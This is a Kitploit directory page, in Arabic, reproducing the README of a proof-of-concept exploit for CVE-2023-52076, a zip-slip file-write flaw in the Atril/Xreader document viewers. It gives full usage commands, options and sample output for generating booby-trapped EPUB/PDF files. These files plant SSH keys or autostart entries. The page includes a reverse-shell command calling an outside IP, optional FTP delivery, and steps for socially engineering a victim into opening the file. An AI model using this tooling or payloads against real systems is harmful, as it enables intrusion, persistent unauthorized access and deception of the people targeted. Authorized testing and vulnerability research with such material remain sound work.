Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-52076-PoC — استغلال PoC للثغرة CVE-2023-52076 - ثغرة اجتياز المسار من نوع zip-slip في Atril/Xreader (MATE/Cinnamon)، تتيح كتابة ملفات عشوائية وتنفيذ تعليمات برمجية عن بُعد (RCE) عبر ملف EPUB مُصمَّم خصيصًا. للاستخدام في الاختبارات الأمنية المصرح بها فقط. | Kitploit
أدوات/GitHubGitHub/groppoxx/cve-2023-52076-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالهندسة الاجتماعيةاستغلال الملفات الثنائية
GitHubgroppoxx/cve-2023-52076-poc

CVE-2023-52076-PoC

استغلال PoC للثغرة CVE-2023-52076 - ثغرة اجتياز المسار من نوع zip-slip في Atril/Xreader (MATE/Cinnamon)، تتيح كتابة ملفات عشوائية وتنفيذ تعليمات برمجية عن بُعد (RCE) عبر ملف EPUB مُصمَّم خصيصًا. للاستخدام في الاختبارات الأمنية المصرح بها فقط.

عرض المستودع
3منذ 24 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-52076-PoC

إثبات مفهوم لثغرة CVE-2023-52076، وهي ثغرة حرجة في اجتياز المسار وكتابة الملفات التعسفية في عارضي المستندات Atril/Xreader، وتؤثر على بيئات سطح مكتب MATE.

ينشئ البرنامج النصي حمولة EPUB مصمَّمة بعناية تحتوي مسارات zip-slip تستهدف إما إعدادات SSH أو إدخالات سطح المكتب autostart، مما يتيح تنفيذ أوامر عن بُعد على الأنظمة المستهدفة.

ماذا يفعل؟

  1. يدعم وضعين للاستغلال: حقن مفتاح SSH أو RCE عبر autostart.
  2. يولّد زوج مفاتيح RSA (وضع SSH فقط).
  3. يبني ملف EPUB صالحًا مع مسارات zip-slip مضمّنة تستهدف الاستخراج الهش.
  4. يكتب الحمولة في 5-9 متغيرات لمسارات الاجتياز باستخدام حيل /proc/self/cwd.
  5. ينشئ نسختين .epub و.pdf (كلتاهما تطلقان الثغرة).
  6. يتحقق من بنية الحمولة ويؤكد سلامة جميع الإدخالات.
  7. يرفع الحمولة اختياريًا عبر FTP مجهول.

المتطلبات

root@kitploit:~
Python 3.8+
ssh-keygen in PATH (SSH mode only)

بدء سريع

وضع SSH (موصى به)

توليد حمولة SSH محليًا:

root@kitploit:~
python3 cve_2023_52076.py --mode ssh

وضع Autostart

توليد حمولة RCE عبر autostart بأمر مخصص:

root@kitploit:~
python3 cve_2023_52076.py --mode autostart --command "id > /tmp/pwned.txt"

مثال كامل

وضع SSH مع رفع عبر FTP

root@kitploit:~
python3 cve_2023_52076.py \
  --mode ssh \
  --name slippy-ssh \
  --key ./keys/atril_rsa \
  --output-dir ./payloads \
  --upload \
  --host ftp.target.local \
  --ftp-dir pub

مثال على المخرجات:

root@kitploit:~
[2026-07-27T14:23:45Z] [*] Generating RSA-3072 keypair: ./keys/atril_rsa
[2026-07-27T14:23:47Z] [*] Building EPUB with 9 zip-slip entries
[2026-07-27T14:23:47Z] [*] Validating payload: ./payloads/slippy-ssh.epub
[2026-07-27T14:23:47Z] [+] Validated 9 payload entries
[2026-07-27T14:23:47Z] [*] Connecting to FTP ftp.target.local:21
[2026-07-27T14:23:48Z] [*] Uploading ./payloads/slippy-ssh.epub as slippy-ssh.epub
[2026-07-27T14:23:48Z] [+] Upload complete. Remote directory listing:
-rw-r--r-- 1 0 0 2048 Jul 27 14:23 slippy-ssh.epub

[+] Payload ready
Mode:        SSH (authorized_keys)
Private key: ./keys/atril_rsa (mode 600)
Public key:  ./keys/atril_rsa.pub
Fingerprint: 3072 SHA256:abcd1234... atril-poc (RSA)
EPUB:        ./payloads/slippy-ssh.epub
PDF copy:    ./payloads/slippy-ssh.pdf

[+] SSH login remains manual:
    ssh -i ./keys/atril_rsa -o IdentitiesOnly=yes <user>@<target>

وضع Autostart مع رفع عبر FTP

root@kitploit:~
python3 cve_2023_52076.py \
  --mode autostart \
  --command "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" \
  --name slippy-rce \
  --output-dir ./payloads \
  --upload \
  --host ftp.target.local \
  --ftp-dir pub

مثال على المخرجات:

root@kitploit:~
[2026-07-27T14:25:10Z] [*] Building EPUB with 5 zip-slip entries
[2026-07-27T14:25:10Z] [*] Validating payload: ./payloads/slippy-rce.epub
[2026-07-27T14:25:10Z] [+] Validated 5 payload entries
[2026-07-27T14:25:10Z] [*] Connecting to FTP ftp.target.local:21
[2026-07-27T14:25:11Z] [*] Uploading ./payloads/slippy-rce.epub as slippy-rce.epub
[2026-07-27T14:25:11Z] [+] Upload complete.

[+] Payload ready
Mode:       Autostart (.desktop RCE)
Command:    bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
EPUB:       ./payloads/slippy-rce.epub
PDF copy:   ./payloads/slippy-rce.pdf

[+] Victim must logout/login for autostart to trigger

الخيارات الاختيارية

root@kitploit:~
--mode {ssh,autostart}
   Payload mode. Default: ssh
   ssh: Inject SSH authorized_keys (no victim interaction needed after file opens).
   autostart: Create .desktop RCE in autostart (triggers on next logout/login).

--command <CMD>
   Payload command for --mode autostart. Required if --mode autostart.
   Example: --command "id > /tmp/pwned.txt"

--name <NAME>
   Local payload basename. Default: base-clean

--key <PATH>
   Private key path (SSH mode only). Default: slippy_rsa

--key-bits <BITS>
   RSA key size (SSH mode only). Options: 2048, 3072, 4096. Default: 3072

--output-dir <DIR>
   Output directory for .epub/.pdf. Default: output

--upload
   Upload the payload to FTP after generating.

--host <HOST>
   FTP target host or IP. Required if --upload is set.

--port <PORT>
   FTP port. Default: 21

--ftp-dir <DIR>
   Remote FTP directory, e.g. pub.

--ftp-user <USER>
   FTP username. Default: anonymous

--ftp-password <PWD>
   FTP password. Default: anonymous@

--remote-name <NAME>
   Remote EPUB filename. Default: ludwig.epub

--upload-pdf
   Upload the .pdf copy instead of the .epub.

--force
   Replace existing output and key files.

--timeout <SECONDS>
   FTP connection timeout. Default: 10.0

--only-final
   Hide progress logs and print only the final summary.

--no-color
   Disable ANSI colors.

--debug
   Print executed subprocess commands (ssh-keygen).

سير الاستغلال

وضع SSH

  1. توليد الحمولة: ينشئ البرنامج النصي ملف EPUB يحتوي على المفتاح العام في مسارات authorized_keys.
  2. الهندسة الاجتماعية: أرسل ملف EPUB/PDF إلى الهدف (مقنّعًا ككتاب إلكتروني).
  3. يفتح الضحية الملف: يقوم Atril/Xreader باستخراج محتويات EPUB.
  4. اجتياز المسار: يكتب الكود الهش المفتاح العام إلى ~/.ssh/authorized_keys.
  5. الوصول عبر SSH: يتصل المهاجم باستخدام المفتاح الخاص.

وضع Autostart

  1. توليد الحمولة: ينشئ البرنامج النصي ملف EPUB يحتوي على إدخال .desktop في مسارات autostart.
  2. الهندسة الاجتماعية: أرسل ملف EPUB/PDF إلى الهدف.
  3. يفتح الضحية الملف: يقوم Atril/Xreader باستخراج محتويات EPUB.
  4. اجتياز المسار: يكتب الكود الهش ملف .desktop إلى ~/.config/autostart/.
  5. التشغيل: عند تسجيل الخروج/الدخول التالي، ينفّذ ملف .desktop الأمر تلقائيًا.

نقاط رئيسية

  • لا يتطلب اسم مستخدم: يتم حل أداة /proc/self/cwd وقت الاستخراج.
  • متغيرات مسار متعددة: 9 مسارات لوضع SSH و5 لوضع autostart، لتعظيم فرص النجاح عبر أعماق الدلائل المختلفة.
  • لا يستبدل الملفات: ينشئ ملفات جديدة فقط (مع مراعاة قيود الثغرة).
  • وضع عدم الاتصال: توليد الحمولات دون تسليم عبر FTP (استخدم --upload فقط عند الحاجة).
  • أوامر مرنة: يدعم وضع autostart أي أمر bash.
  • وضع SSH فوري: لا حاجة لأي تفاعل من الضحية بعد فتح الملف.
  • يتطلب وضع autostart إعادة تسجيل الدخول: يجب على الضحية تسجيل الخروج/الدخول حتى يتم تشغيل RCE.

ملاحظات

  • الإصدارات المتأثرة: Atril (MATE DE)، Xreader (Cinnamon, Linux Mint) < 1.26.2.
  • تم الاختبار على: Kali Linux, Parrot OS, Ubuntu-Mate, Xubuntu.
  • يتطلب فتح الضحية للمستند المصمَّم في العارض الهش.
  • يعمل دون اتصال؛ لا يوجد اتصال شبكي راجع للمهاجم أثناء الاستغلال.
  • أفضل ممارسة: التسليم عبر FTP (--upload) لتجنب الاستضافة المباشرة.

الجانب القانوني

إثبات المفهوم هذا مخصص لـاختبارات الأمان المصرَّح بها، وبيئات المختبرات، والتحقق من الثغرات الأمنية. لا تستخدمه ضد أي أنظمة دون إذن صريح.

تنزيل الأداة